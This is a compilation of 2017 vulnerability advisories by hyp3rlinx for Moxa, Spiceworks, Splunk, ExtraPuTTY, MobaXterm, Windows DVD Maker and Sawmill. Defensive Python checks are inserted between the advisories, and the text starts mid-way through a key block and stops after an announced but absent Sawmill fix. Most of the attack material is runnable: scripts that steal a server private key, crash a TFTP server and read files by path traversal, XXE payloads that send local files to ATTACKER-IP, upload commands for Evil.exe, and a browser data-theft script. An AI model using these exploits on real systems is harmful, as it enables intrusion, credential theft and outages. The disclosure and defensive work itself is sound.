+CPTV6agBkYxe7Q=
-----END PRIVATE KEY-----

Exploit:
==================
import socket

print 'Moxa MXview 2.8 Remote Private Key Theft'
print 'by hyp3rlinx\n'

IP=raw_input("[Moxa MXview IP]> ")
PORT=int(raw_input("[PORT]> "))

#Connection: close makes the server end the connection after the response,
#so the read loop below terminates.
STEAL_PRV_KEY="GET /certs/mxview.key HTTP/1.1\r\nHost: "+IP+"\r\nConnection: close\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(STEAL_PRV_KEY)
print 'Enjoy ur private server key!\n'

#The key body alone is 916 bytes, so a single recv(512) would truncate it;
#read until the server closes the connection.
resp=''
while 1:
    chunk=s.recv(4096)
    if not chunk:
        break
    resp+=chunk
s.close()
print resp

Network Access:
==================
Remote

Severity:
==================
Critical

Disclosure Timeline:
==================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.moxa.com

Product:
==================
MX-AOPC UA SERVER - 1.5

Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication.

Vulnerability Type:
==================
XML External Entity Injection

CVE Reference:
==================
CVE-2017-7457

Security Issue:
==================
XML External Entity injection via the ".AOP" project files used by MX-AOPC Server results in remote file disclosure if a local user opens a specially crafted malicious MX-AOPC Server file. The parser fetches the external DTD named in the file, and the attacker's DTD defines an entity whose URL carries the contents of a local file back to the attacker's listener.

Exploit/POC:
==================
Run MX-AOPC UA Server / Runtime / Start Server Runtime Service.

a) ATTACKER SERVER LISTENER (we will read C:\Windows\msdfmap.ini as proof of concept):

python -m SimpleHTTPServer 8080

"Evil.AOP" file:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<data>&send;</data>

b) Evil "payload.dtd" file hosted on the ATTACKER SERVER:

<!ENTITY % file SYSTEM "file:///C:/Windows/msdfmap.ini">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;

e.g.

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 -

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
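Two checks a defender can run for this class of bug, as added Python that is not Moxa code: a pre-parse scan of an .AOP file for a DOCTYPE that declares external entities or expands parameter entities, which a project file never needs, and a decoder for the listener's log line that turns the percent-encoded query back into the leaked file. The sample .AOP, payload.dtd and log line are constructed from the payload above, with the leaked query shortened.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

ENTITY_DECL = re.compile(r"<!ENTITY\s+(%\s*)?([^\s>\"']+)\s+(SYSTEM|PUBLIC)\b", re.I)
PE_REFERENCE = re.compile(r"%[\w.-]+;")             # %dtd; %all; ...
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)


def external_entities(xml_text: str) -> List[Tuple[bool, str, str]]:
    """(is_parameter_entity, name, keyword) for every SYSTEM/PUBLIC entity declaration,
    including ones nested inside another entity's value (the %all; trick)."""
    return [(bool(m.group(1)), m.group(2), m.group(3).upper())
            for m in ENTITY_DECL.finditer(xml_text)]


def is_suspicious_aop(xml_text: str) -> bool:
    """A project file should never carry a DOCTYPE that declares external entities
    or expands parameter entities; either one is the XXE signature."""
    head = xml_text[:4096]                          # the DTD must precede the root element
    if not DOCTYPE.search(head):
        return False
    return bool(external_entities(head)) or bool(PE_REFERENCE.search(head))


LOG_LINE = re.compile(r'^(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})')


def recover_leak(log_line: str) -> Optional[str]:
    """The SimpleHTTPServer listener logs the query string the victim sent; percent-
    decoding it gives the leaked file back (line breaks were lost in the URL)."""
    m = LOG_LINE.match(log_line)
    if not m or "?" not in m.group("path"):
        return None
    return unquote(m.group("path").split("?", 1)[1])


# Constructed samples based on the advisory's payload (not files shipped with MX-AOPC).
EVIL_AOP = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<data>&send;</data>
"""
PAYLOAD_DTD = """<!ENTITY % file SYSTEM "file:///C:/Windows/msdfmap.ini">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
"""
BENIGN_AOP = '<?xml version="1.0"?>\n<data><tag name="Temperature"/></data>\n'
LISTENER_LOG = ('VICTIM-IP - - [02/Mar/2017 10:06:00] '
                '"GET /?;[connect%20name]%20will%20modify%20the%20connection HTTP/1.1" 200 -')

if __name__ == "__main__":
    print("Evil.AOP suspicious :", is_suspicious_aop(EVIL_AOP), external_entities(EVIL_AOP))
    print("payload.dtd declares:", external_entities(PAYLOAD_DTD))
    print("benign suspicious   :", is_suspicious_aop(BENIGN_AOP))
    print("leak recovered      :", recover_leak(LISTENER_LOG))
```

The scan is a gate in front of the real parser, not a replacement for configuring it: the lasting fix is to parse .AOP files with DTD loading and external entity resolution disabled, which is what Moxa's update would have to do on the victim's side.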
Spiceworks 7.5 TFTP Improper Access Control File Overwrite / Upload
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
[+] ISR: APPARITIONSEC

Vendor:
==================
www.spiceworks.com

Product:
==================
Spiceworks - 7.5

Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices. It can be configured to provide custom alerts and notifications based on various criteria. It also provides a ticketing system, a user portal, an integrated knowledge base, and mobile ticket management.

Vulnerability Type:
==================
Improper Access Control File Overwrite / Upload

CVE Reference:
==================
CVE-2017-7237

Security Issue:
==================
The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations" directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to overwrite files within the Spiceworks configurations directory if the targeted file name is known or guessed.

Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to "data\configurations". This can potentially become a Remote Code Execution vulnerability if, for example, an executable file (EXE, BAT) is dropped and later accessed and run by an unknowing Spiceworks user.

References (released April 3, 2017):
https://community.spiceworks.com/support/inventory/docs/network-config#security

Proof:
==================
1) Install Spiceworks
2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
3) The original someconfig gets overwritten

OR arbitrary file upload:

c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe

Network Access:
==================
Remote

Severity:
==================
High

Disclosure Timeline:
==================
Vendor Notification: March 13, 2017
Sent vendor e.g. POC : March 23, 2017
Request status : March 30, 2017
Vendor reply: "We are still working on this" : March 30, 2017
Vendor reply: "Thanks for bringing this to our attention" and releases basic security note of issue on website : April 3, 2017
April 5, 2017 : Public Disclosure
Splunk Enterprise Information Theft CVE-2017-5607
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.splunk.com

Product:
========
Splunk Enterprise

Splunk provides the leading platform for Operational Intelligence. Customers use Splunk to search, monitor, analyze and visualize machine data. Splunk Enterprise collects and analyzes high volumes of machine-generated data.

Vulnerability Type:
===================
JavaScript (JSON) Information Theft

CVE Reference:
==============
CVE-2017-5607

Security Issue:
===============
Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and whether the remote user setting is enabled. Afterwards, the username can be used to phish or brute force the Splunk Enterprise login. Additional information stolen may aid in furthering attacks.

Root cause is the global Window JS variable assignment of config?autoload=1 '$C'.

e.g.
window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... }

To steal information we can simply define a function to be called when the '$C' JS property is "set" on the webpage, for example:

Object.defineProperty( Object.prototype, "$C", { set:function(val){...

Object.prototype is the object that every other object inherits from in JavaScript. If we create a setter under the name of our target, in this case "$C", we can get/steal the value of this data; in this case it is very easy as it is assigned to the global Window namespace.

Affected Splunk Enterprise versions:
6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18
and Splunk Light before 6.5.2

Vulnerability could allow a remote attacker to obtain logged-in username and Splunk version-related information via JavaScript.

References:
===========
https://www.splunk.com/view/SP-CAAAPZ3
https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607

Exploit/POC:
============
Reproduction:

1) Log into Splunk
2) Place the below JavaScript in a webpage on another server.

"Splunk-Data-Theft.html"

Object.defineProperty( Object.prototype, "$C", {
    set:function(val){
        //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
        for(var i in val){
            alert(""+i+" "+val[i]);
        }
    }
});

https://VICTIM-IP:8000/en-US/config?autoload=1

3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current authenticated user
4) Phish or brute force the application.

Video POC URL:
==============
https://vimeo.com/210634562

Network Access:
===============
Remote

Impact:
=======
Information Disclosure

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: November 30, 2016
Vendor Acknowledgement: December 2, 2016
Vendor Release Splunk 6.5.3 / Patch: March 30, 2017
March 31, 2017: Public Disclosure

All content (c). hyp3rlinx
CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.extraputty.com

Product:
========
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork of the 0.67 version of PuTTY. ExtraPuTTY has all the features of the original software and adds others. Below is a short list of the principal features (see all features):

DLL frontend
TestStand API (LabWindows, TestStand 2012)
Timestamp StatusBar
Scripting a session with Lua 5.3
Automatic sequencing of commands
Shortcuts for pre-defined commands
Keyboard shortcuts for pre-defined commands
Portability (use of directory structure)
Integrates FTP, TFTP, SCP, SFTP, Ymodem, Xmodem transfer protocols
Integrates PuTTYcyg, PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change PuTTY settings during session
PuTTYcmdSender: tool to send a command or keyboard shortcut to multiple PuTTY windows

Vulnerability Type:
===================
TFTP Denial of Service

CVE Reference:
==============
CVE-2017-7183

Security Issue:
===============
The TFTP server component of ExtraPuTTY is vulnerable to a remote Denial of Service attack by sending large junk UDP Read/Write TFTP protocol request packets.

Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run the below Python exploit.

Then, BOOM

(100c.30c): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
eax= ebx=0929ee98 ecx=0174 edx=7efefeff esi=0002 edi=
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!ZwWaitForMultipleObjects+0x15:

Exploit/POC:
============
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET = raw_input("[IP]>")
TYPE = int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH = "A"*2000
PORT = 69

if TYPE==1:
    PAYLOAD = "\x00\x01"            # RRQ opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"
elif TYPE==2:
    PAYLOAD = "\x00\x02"            # WRQ opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # probe first with a well-formed read request to see whether the server answers
    s.sendto("\x00\x01TEST\x00netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
    print 'Server not avail, try later'

s.close()

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: No reply
March 20, 2017: Public Disclosure

All content (c). hyp3rlinx
CVE-2017-6805 MobaXterm Personal Edition v9.4 Path Traversal Remote File Disclosure
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec

Vendor:
=======
mobaxterm.mobatek.net

Product:
========
MobaXterm Personal Edition v9.4

Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.

Vulnerability Type:
===================
Path Traversal Remote File Disclosure

CVE Reference:
==============
CVE-2017-6805

Security Issue:
===============
Remote attackers can use a UDP socket connection to the TFTP server on port 69 and send a Read request to retrieve otherwise protected files using directory traversal attacks, e.g. ../../../../Windows/system.ini

Start MobaXterm TFTP server, which listens on the default TFTP port 69.

c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s

c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

Victim Data located on: 127.0.0.1

POC URL:
========
https://vimeo.com/207516364

Exploit:
========
import sys,socket

print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'

HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"                        #TFTP Read
PAYLOAD += "../" * 4 + FILE + "\x00"        #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"                   #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()

Network Access:
===============
Remote

Severity:
=========
High

Disclosure Timeline:
====================
Vendor Notification: No Reply
March 10, 2017: Public Disclosure

All content (c). hyp3rlinx
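The MobaXterm read above, the Spiceworks overwrite earlier on this page and the oversized ExtraPuTTY requests all come down to a TFTP server acting on the request exactly as the client sent it. The following is an added example, not code from any of those vendors or from the advisories: a Python 3 RFC 1350 request parser plus the path and write policy a TFTP server should apply. DEMO_ROOT, MAX_FILENAME, the blocked-upload list and the sample packets are constructed here.

```python
"""TFTP request handling that keeps every client inside the served directory.

Added example for this page, not MobaXterm, Spiceworks or ExtraPuTTY code.
It parses an RFC 1350 read/write request, confines the client-supplied name
to DEMO_ROOT, bounds the request size, and refuses writes (and executable
uploads) unless the operator opts in.  DEMO_ROOT, the policy constants and
the sample packets are constructed here.
"""
import struct
from pathlib import Path

RRQ, WRQ = 1, 2
OPCODE_NAMES = {RRQ: "RRQ", WRQ: "WRQ"}
DEMO_ROOT = Path("/srv/tftp")          # constructed served directory
MAX_FILENAME = 255                     # constructed bound (RFC 1350 sets none)
BLOCKED_UPLOAD_SUFFIXES = {".exe", ".bat", ".cmd", ".com", ".ps1", ".dll"}


class TftpPolicyError(Exception):
    """The request parsed cleanly but violates server policy."""


def build_request(opcode: int, filename: str, mode: str = "netascii") -> bytes:
    """Encode an RRQ/WRQ the way a client sends it (used for the samples)."""
    return struct.pack("!H", opcode) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def parse_request(packet: bytes):
    """Decode (opcode, filename, mode), rejecting anything that is not a
    clean, bounded RRQ/WRQ so that oversized or unterminated junk such as a
    2000-byte filename never reaches the file-handling code."""
    if len(packet) < 4:
        raise ValueError("packet too short for a TFTP request")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in OPCODE_NAMES:
        raise ValueError(f"opcode {opcode} is not RRQ/WRQ")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise ValueError("filename and mode must both be present and NUL-terminated")
    if len(fields[0]) > MAX_FILENAME:
        raise ValueError(f"filename longer than {MAX_FILENAME} bytes")
    filename = fields[0].decode("ascii")        # strict: non-ASCII names are refused
    mode = fields[1].decode("ascii").lower()
    if mode not in ("netascii", "octet"):
        raise ValueError(f"unsupported transfer mode {mode!r}")
    return opcode, filename, mode


def resolve_in_root(root: Path, filename: str) -> Path:
    """Map a client-supplied name onto a path that must stay under `root`.

    Both '/' and '\\' count as separators (a Windows server accepts either),
    every name is treated as relative so a drive letter or leading slash is
    dropped, and any '..' segment is rejected outright rather than normalised.
    The resolved target is then compared with the resolved root, so a symlink
    inside the tree cannot point outside it either."""
    segments = [s for s in filename.replace("\\", "/").split("/") if s not in ("", ".")]
    if not segments or ".." in segments or ":" in segments[0]:
        raise TftpPolicyError(f"rejected path {filename!r}")
    root_real = root.resolve()
    target = root_real.joinpath(*segments).resolve()
    if target != root_real and root_real not in target.parents:
        raise TftpPolicyError(f"{filename!r} resolves outside the TFTP root")
    return target


def authorize(packet: bytes, root: Path = DEMO_ROOT, allow_write: bool = False):
    """Full policy decision for one request: returns (operation, target)."""
    opcode, filename, _mode = parse_request(packet)
    target = resolve_in_root(root, filename)
    if opcode == WRQ:
        if not allow_write:
            raise TftpPolicyError("WRQ refused: uploads are disabled on this server")
        if target.suffix.lower() in BLOCKED_UPLOAD_SUFFIXES:
            raise TftpPolicyError(f"WRQ refused: executable name {target.name!r}")
    return OPCODE_NAMES[opcode], target


def check(packet: bytes, root: Path = DEMO_ROOT, allow_write: bool = False) -> str:
    """One-line verdict suitable for a server log."""
    try:
        op, target = authorize(packet, root, allow_write)
        return f"OK {op} {target}"
    except (ValueError, TftpPolicyError) as exc:
        return f"DENIED {exc}"


if __name__ == "__main__":
    samples = [
        build_request(RRQ, "../../../../Windows/system.ini"),   # traversal read
        build_request(RRQ, "configs/router1.cfg"),              # legitimate read
        build_request(WRQ, "someconfig"),                       # config overwrite
        build_request(WRQ, "Evil.exe"),                         # executable upload
        build_request(RRQ, "A" * 2000),                         # oversized request
    ]
    for pkt in samples:
        print(check(pkt, allow_write=True))
```

Run stand-alone it prints one verdict per sample; with the default allow_write=False every WRQ is refused regardless of name.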
CVE-2017-0045 Windows DVD Maker XML External Entity File Disclosure
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.microsoft.com

Product:
========
Windows DVD Maker v6.1.7

Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player.

Vulnerability Type:
===================
XML External Entity Injection

CVE Reference:
==============
CVE-2017-0045
MS17-020

Security Issue:
===============
Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks, allowing remote attackers to gain access to files from a victim's computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosure.

POC URL:
========
https://vimeo.com/208383182

References:
===========
https://technet.microsoft.com/library/security/MS17-020
https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017

Applies to:
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Standard
Windows Web Server 2008 R2
Windows Server 2008 R2 Foundation
Windows 7 Service Pack 1
Windows 7 Ultimate
Windows 7 Enterprise
Windows 7 Professional
Windows 7 Home Premium
Windows 7 Home Basic
Windows 7 Starter
Windows Server 2008 Service Pack 2
Windows Server 2008 Foundation
Windows Server 2008 Standard
Windows Server 2008 for Itanium-Based Systems
Windows Web Server 2008
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Vista Service Pack 2
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Business
Windows Vista Ultimate
Windows Vista Enterprise
Windows Vista Starter

Exploit code(s):
================
Steal the XAMPP Web Server's private key "server.key".
1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)

2) "payload.dtd"
http://ATTACKER-IP:8080?%file;'>"> %all;

3) "Evil.msdvd"
http://ATTACKER-IP:8080/payload.dtd;> %dtd;]>

RESULT: XAMPP Web Server private key sent to attacker, e.g.

C:\>python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-[key material omitted]-END%20RSA%20PRIVATE%20KEY- HTTP/1.1" 301 -
127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-[key material omitted]-END%20RSA%20PRIVATE%20KEY-/ HTTP/1.1" 200 -

Disclosure Timeline:
====================
Vendor Notification: September 3, 2016
Vendor acknowledgement: November 17, 2016
March 14, 2017: Vendor released MS17-020
March 15, 2017: Public Disclosure

Network access:
===============
Remote

Severity:
=========
High
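The .msdvd issue above is the general XXE pattern: a DOCTYPE that points at an attacker-hosted DTD or a local file, honoured by whatever parses the project file. The following is an added example, not Windows DVD Maker code: a Python 3 loader for untrusted XML that fails closed on any DTD or entity declaration before the document is parsed at all. The element names, the sample documents and the http://ATTACKER-IP:8080/payload.dtd reference (mirroring the advisory's placeholder) are constructed.

```python
"""Fail-closed loader for untrusted XML project files.

Added example for this page (not Windows DVD Maker code).  The element names,
the sample documents and the http://ATTACKER-IP:8080/payload.dtd reference
(mirroring the advisory's placeholder) are all constructed here.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """The document declares a DTD or entity: exactly what an XXE-prone
    parser would use to read local files or call out to a remote server."""


def reject_dtd(data: bytes) -> None:
    """Raise UnsafeXml on the first DOCTYPE, ENTITY or external reference.

    Expat invokes the doctype handler as soon as it reads '<!DOCTYPE', before
    the internal subset, so the parse stops before any SYSTEM identifier is
    handed to a resolver.  Parameter-entity expansion is switched off as well,
    so a '%dtd;' reference could never pull in an external DTD.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE not permitted (root {name!r}, system id {system_id!r})")

    def on_entity_decl(entity_name, *rest):
        raise UnsafeXml(f"ENTITY declaration not permitted: {entity_name!r}")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXml(f"external entity reference not permitted: {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)          # raises ExpatError on malformed XML


def is_safe(data: bytes) -> bool:
    """Policy verdict only: True when the document carries no DTD at all."""
    try:
        reject_dtd(data)
        return True
    except UnsafeXml:
        return False


def load_project(data: bytes) -> ET.Element:
    """Vet first, then parse normally.  ElementTree does not fetch external
    entities on its own, but failing closed on any DTD keeps the policy from
    depending on parser defaults that differ between libraries and versions."""
    reject_dtd(data)
    return ET.fromstring(data)


# Constructed sample standing in for an ordinary project file.
BENIGN = (b'<?xml version="1.0"?>'
          b'<project version="1"><title>Holiday</title></project>')

# Constructed: the out-of-band pattern the advisory describes, a parameter
# entity that would pull a DTD from the attacker's host.
OOB_DTD = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE project [<!ENTITY % dtd SYSTEM '
           b'"http://ATTACKER-IP:8080/payload.dtd"> %dtd;]>'
           b'<project/>')

# Constructed: the same fetch expressed as an external DOCTYPE, no internal subset.
EXTERNAL_DOCTYPE = (b'<?xml version="1.0"?>'
                    b'<!DOCTYPE project SYSTEM "http://ATTACKER-IP:8080/payload.dtd">'
                    b'<project/>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("oob-dtd", OOB_DTD), ("ext-doctype", EXTERNAL_DOCTYPE)):
        print(f"{label:12} safe={is_safe(doc)}")
    print("title:", load_project(BENIGN).findtext("title"))
```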
Sawmill Enterprise v8.7.9 Pass The Hash Authentication Bypass
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.sawmill.net

Product:
========
Sawmill Enterprise v8.7.9
sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0

Sawmill is a powerful hierarchical log analysis tool that runs on every major platform.

Vulnerability Type:
===================
Pass the Hash Authentication Bypass

CVE Reference:
==============
CVE-2017-5496

Security Issue:
===============
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can log in to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking of account password hashes. This issue is usually known to affect Windows systems, e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable Web application.

Sawmill account password hashes are stored under the LogAnalysisInfo/ directory in "users.cfg".

e.g.
users = {
  root_admin = {
    username = "admin"
    password_checksum = "e99a18c428cb38d5f260853678922e03"
    email_address = ""

This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmill's authentication process.

Moreover, since the 'users.cfg' file is world readable, a regular non-Admin Windows user who logs into the system running Sawmill can grab a password hash and easily log in to the vulnerable application without needing the password itself.

How to test?

With Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non-Administrator user.

1) Open "users.cfg" under Sawmill's directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
2) Go to the Sawmill login page in a web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash. Tada! You're Admin.

Finally, Sawmill passwords are hashed using the vulnerable MD5 algorithm and no salt.

e.g.
password: abc123
MD5 hash: e99a18c428cb38d5f260853678922e03

Disclosure Timeline:
====================
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned: January 20
Request status: January 26
Vendor: Fix avail later in year, still no ETA
Inform vendor public disclose date
February 18, 2017: Public Disclosure

Network Access:
===============
Remote

Impact:
=======
Information Disclosure
Privilege Escalation

Severity Level:
===============
High

Hyp3rlinx
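The Sawmill flaw has two halves: the stored value is an unsalted MD5, and the login compares what the client submits against that stored value directly, so the hash is the credential. The following is an added example, not Sawmill code: LEGACY_RECORD mirrors the users.cfg excerpt above, and the hardened scheme (per-user random salt, PBKDF2-HMAC-SHA256, server-side derivation from the typed password, transparent migration at next login) is constructed here.

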